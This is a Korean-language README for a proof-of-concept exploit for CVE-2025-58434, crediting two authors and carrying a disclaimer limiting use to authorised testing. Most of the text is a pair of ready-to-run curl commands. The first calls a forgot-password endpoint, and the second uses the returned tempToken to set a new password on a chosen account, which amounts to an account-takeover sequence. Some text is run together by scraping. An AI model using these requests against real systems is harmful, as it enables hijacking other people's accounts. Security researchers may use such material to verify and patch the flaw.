
CVE-2025-58434 개념 증명
POST /api/v1/account/forgot-password를 트리거하는 Python PoC 스크립트입니다.
⚠️ 교육 및 승인된 보안 연구 목적으로만 사용하세요. 소유하지 않았거나 서면 허가 없이 테스트할 권한이 없는 시스템에 이 도구를 실행하는 것은 불법입니다.
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434에 대한 PoCpoc.py: 대상 시스템 URL/IP를 입력받고, 호스트/IP만 입력한 경우 선택적 프로토콜, 대상 이메일, 비밀번호를 입력받은 다음 요청을 전송하고 curl -i처럼 HTTP 상태 코드, 헤더 및 응답 본문을 출력합니다.실행:
python3 poc.py
그런 다음 다음 항목을 입력합니다:
10.10.11.10, http://10.10.11.10, https://target.example)curl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'